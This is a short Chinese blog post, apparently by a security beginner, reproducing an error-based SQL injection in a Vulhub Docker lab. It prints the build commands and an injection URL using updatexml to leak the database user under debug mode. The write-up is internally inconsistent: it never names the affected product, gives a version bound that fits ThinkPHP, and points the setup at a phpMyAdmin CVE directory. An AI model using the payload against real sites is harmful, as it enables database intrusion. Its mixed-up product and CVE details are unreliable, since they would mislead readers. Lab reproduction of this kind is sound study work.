我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。
前文:
名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别
Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)
漏洞影响:
<5.0.9
该漏洞形成最关键的一点是需要开启debug模式
漏洞复现:
vulhub目录cd vulhub/phpmyadmin/CVE-2018-12613#
对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d
启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2
,即可看到用户名被显示了出
来,说明环境运行成功打开页面,插入sql报错注入语句
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
,您将发现成功显示的消息:
值得一提的是这种数据库账户和密码泄漏的前提是SQL语句执行失败或者发生异常的时候才会出现。如果非SQL语法错误的debug模式下是不会泄漏数据库账户和密码的。
参考资料:
https://forum.90sec.com/t/topic/407
https://www.freebuf.com/column/205976.html